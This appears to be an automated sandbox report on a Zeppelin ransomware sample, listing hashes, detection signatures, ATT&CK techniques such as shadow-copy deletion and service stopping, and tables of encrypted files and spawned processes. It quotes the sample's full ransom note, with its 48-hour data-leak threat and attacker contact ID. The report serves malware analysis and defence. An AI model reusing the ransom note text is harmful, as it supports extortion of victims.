zeppelin | 52e8721e17365eb4281908df3ffbe6920ad0da496ec7b6288812e564002801b7

Analysis

max time kernel
120s
max time network
123s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
01-08-2023 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
Size

225KB
MD5

3145cd124db5c8c34e053aea87694baa
SHA1

5645f85669b81b82936a821900425046a511dc8d
SHA256

52e8721e17365eb4281908df3ffbe6920ad0da496ec7b6288812e564002801b7
SHA512

a180166e2cc56ec429e7edfee7fbf8e2cbf3ec64190a0270995340ece4047d525d239b8230759bf2f1f17912b6e357c06608c2414658d3cd03edb28c36b006e1
SSDEEP

6144:3SK1AqRHi/EXtw+apQ3an64DQFu/U3buRKlemZ9DnGAeOhYp+c:3osHiGWRpQb4DQFu/U3buRKlemZ9DnGn

Score

10^/10

zeppelin evasion ransomware

Malware Config

Extracted

Path

C:\Program Files\Java\jdk1.7.0_80\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Ransom Note

!!! YOUR FILES HAVE BEEN ENCRYPTED !!! All your files, including documents, databases, and other crucial data, have been encrypted. I've uploaded some databases and important files from your computers to the cloud. You have 48 hours to get in touch with us and reach an agreement. If you don't contact us by the end of this period, I'll release your data publicly on the dark web. This could damage your company and your partners. We're the only ones capable of restoring your files. To prove that we have a functional decryption tool, we're offering you the chance to decrypt one file for free. You can reach out to us through an anonymous chat. Just follow the provided instructions. 1. Visit https://tox.chat/download.html 2. Download and install qTox on your computer. 3. Open it, click "New Profile," and create a new profile. 4. Press the + "Add to friends" button and enter my TOX ID DBA5908245E3067FDA9B0C0D6FEEADC3D3C965A29AC340CA14D539924700DC53948D5F860D7D 5. Click "Send friend request." 6. Keep qTox open and wait. In a few hours, I'll accept your request, and we can begin communicating. Your personal ID: 1F5-33B-521

URLs

https://tox.chat/download.html

Signatures

Detects Zeppelin payload 15 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2916-57-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/744-3234-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-4371-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/744-7033-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-8132-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/744-10833-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-11709-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-13586-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-17184-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-20988-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-24127-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-26757-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-28447-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/2852-30486-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin
behavioral1/memory/744-30521-0x0000000000170000-0x00000000002B3000-memory.dmp	family_zeppelin

Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
ransomware zeppelin
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (7459) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

notepad.exe

pid process

1048 notepad.exe

pid	process
1048	notepad.exe

Enumerates connected drives 3 TTPs 32 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exesc.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\V:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\P:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\K:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\G:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\B:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\N:	sc.exe
File opened (read-only)	\??\Y:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\X:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\Z:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\L:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\S:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\E:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\A:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\M:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\H:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\J:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\T:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\N:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\O:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\R:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\Q:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\I:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\W:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened (read-only)	\??\U:	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

Drops file in Program Files directory 64 IoCs

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue.css.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Tijuana	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\NEWS.txt.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\XLMACRO.CHM.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0149018.JPG	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Groove.gif.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318810.WMF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0221903.WMF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21533_.GIF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21311_.GIF	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\SpiderSolitaire.exe.mui	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ERROR.GIF	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\UrbanPhotoAlbum.potx	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\INVITE.XML	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Microsoft Games\More Games\de-DE\MoreGames.dll.mui	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\Notebook03.onepkg	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Sitka	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Juneau	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Executive.eftx.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CHECKER.POC	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115868.GIF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUB6INTL.DLL.IDX_DLL.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178460.JPG	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0186348.WMF	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGMASTHD.DPV.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB2A.BDR.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Palmer	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21326_.GIF.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR41F.GIF	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV_COL.HXC	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid_disable.gif	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_GreenTea.gif.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB3A.BDR.1F5-33B-521	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1860	sc.exe
680	sc.exe
1144	sc.exe
820	sc.exe
2380	sc.exe
1752	sc.exe
2672	sc.exe
2008	sc.exe
2688	sc.exe
2864	sc.exe
2640	sc.exe
1992	sc.exe
3008	sc.exe
1928	sc.exe
1928	sc.exe
1996	sc.exe
2380	sc.exe
2480	sc.exe
1592	sc.exe
2480	sc.exe
2088	sc.exe
2744	sc.exe
1700	sc.exe
2172	sc.exe
580	sc.exe
1032	sc.exe
1468	sc.exe
2116	sc.exe
320	sc.exe
2744	sc.exe
2188	sc.exe
1996	sc.exe
3044	sc.exe
1896	sc.exe
1040	sc.exe
272	sc.exe
280	sc.exe
2040	sc.exe
2292	sc.exe
1732	sc.exe
304	sc.exe
2168	sc.exe
2552	sc.exe
2884	sc.exe
1036	sc.exe
2012	sc.exe
1088	sc.exe
1860	sc.exe
2020	sc.exe
1712	sc.exe
2736	sc.exe
2300	sc.exe
2832	sc.exe
1656	sc.exe
2248	sc.exe
2008	sc.exe
1468	sc.exe
1348	sc.exe
1940	sc.exe
3016	sc.exe
2308	sc.exe
972	sc.exe
2152	sc.exe
2856	sc.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

2188 tasklist.exe
1032 tasklist.exe
2260 tasklist.exe
2724 tasklist.exe
2372 tasklist.exe
2856 tasklist.exe

pid	process
2188	tasklist.exe
1032	tasklist.exe
2260	tasklist.exe
2724	tasklist.exe
2372	tasklist.exe
2856	tasklist.exe

Interacts with shadow copies 2 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1684	vssadmin.exe
2804	vssadmin.exe
936	vssadmin.exe
1964	vssadmin.exe
1924	vssadmin.exe
660	vssadmin.exe
2300	vssadmin.exe
1808	vssadmin.exe
2324	vssadmin.exe
2412	vssadmin.exe
996	vssadmin.exe
2800	vssadmin.exe

Kills process with taskkill 25 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2692	taskkill.exe
1076	taskkill.exe
1956	taskkill.exe
2368	taskkill.exe
3028	taskkill.exe
2056	taskkill.exe
1740	taskkill.exe
3048	taskkill.exe
1304	taskkill.exe
340	taskkill.exe
612	taskkill.exe
1012	taskkill.exe
1796	taskkill.exe
3020	taskkill.exe
1988	taskkill.exe
1692	taskkill.exe
1720	taskkill.exe
1752	taskkill.exe
2276	taskkill.exe
2856	taskkill.exe
2776	taskkill.exe
1244	taskkill.exe
1540	taskkill.exe
3020	taskkill.exe
1108	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

pid	process
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe
744	3145cd124db5c8c34e053aea87694baa_zeppelin_JC.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2772	WMIC.exe
Token: SeSecurityPrivilege	2772	WMIC.exe
Token: SeTakeOwnershipPrivilege	2772	WMIC.exe
Token: SeLoadDriverPrivilege	2772	WMIC.exe
Token: SeSystemProfilePrivilege	2772	WMIC.exe
Token: SeSystemtimePrivilege	2772	WMIC.exe
Token: SeProfSingleProcessPrivilege	2772	WMIC.exe
Token: SeIncBasePriorityPrivilege	2772	WMIC.exe
Token: SeCreatePagefilePrivilege	2772	WMIC.exe
Token: SeBackupPrivilege	2772	WMIC.exe
Token: SeRestorePrivilege	2772	WMIC.exe
Token: SeShutdownPrivilege	2772	WMIC.exe
Token: SeDebugPrivilege	2772	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2772	WMIC.exe
Token: SeRemoteShutdownPrivilege	2772	WMIC.exe
Token: SeUndockPrivilege	2772	WMIC.exe
Token: SeManageVolumePrivilege	2772	WMIC.exe
Token: 33	2772	WMIC.exe
Token: 34	2772	WMIC.exe
Token: 35	2772	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1852	WMIC.exe
Token: SeSecurityPrivilege	1852	WMIC.exe
Token: SeTakeOwnershipPrivilege	1852	WMIC.exe
Token: SeLoadDriverPrivilege	1852	WMIC.exe
Token: SeSystemProfilePrivilege	1852	WMIC.exe
Token: SeSystemtimePrivilege	1852	WMIC.exe
Token: SeProfSingleProcessPrivilege	1852	WMIC.exe
Token: SeIncBasePriorityPrivilege	1852	WMIC.exe
Token: SeCreatePagefilePrivilege	1852	WMIC.exe
Token: SeBackupPrivilege	1852	WMIC.exe
Token: SeRestorePrivilege	1852	WMIC.exe
Token: SeShutdownPrivilege	1852	WMIC.exe
Token: SeDebugPrivilege	1852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1852	WMIC.exe
Token: SeRemoteShutdownPrivilege	1852	WMIC.exe
Token: SeUndockPrivilege	1852	WMIC.exe
Token: SeManageVolumePrivilege	1852	WMIC.exe
Token: 33	1852	WMIC.exe
Token: 34	1852	WMIC.exe
Token: 35	1852	WMIC.exe
Token: SeBackupPrivilege	2424	vssvc.exe
Token: SeRestorePrivilege	2424	vssvc.exe
Token: SeAuditPrivilege	2424	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1852	WMIC.exe
Token: SeSecurityPrivilege	1852	WMIC.exe
Token: SeTakeOwnershipPrivilege	1852	WMIC.exe
Token: SeLoadDriverPrivilege	1852	WMIC.exe
Token: SeSystemProfilePrivilege	1852	WMIC.exe
Token: SeSystemtimePrivilege	1852	WMIC.exe
Token: SeProfSingleProcessPrivilege	1852	WMIC.exe
Token: SeIncBasePriorityPrivilege	1852	WMIC.exe
Token: SeCreatePagefilePrivilege	1852	WMIC.exe
